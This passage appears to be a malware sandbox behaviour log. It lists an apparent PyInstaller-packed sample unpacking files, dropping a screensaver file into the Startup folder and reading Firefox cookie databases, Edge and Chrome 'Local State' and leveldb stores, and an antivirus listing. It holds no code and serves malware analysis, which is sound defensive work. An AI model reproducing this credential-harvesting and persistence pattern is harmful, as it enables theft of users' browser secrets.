              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\bound.blank VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\bound.blank VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ??? ? ?\System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
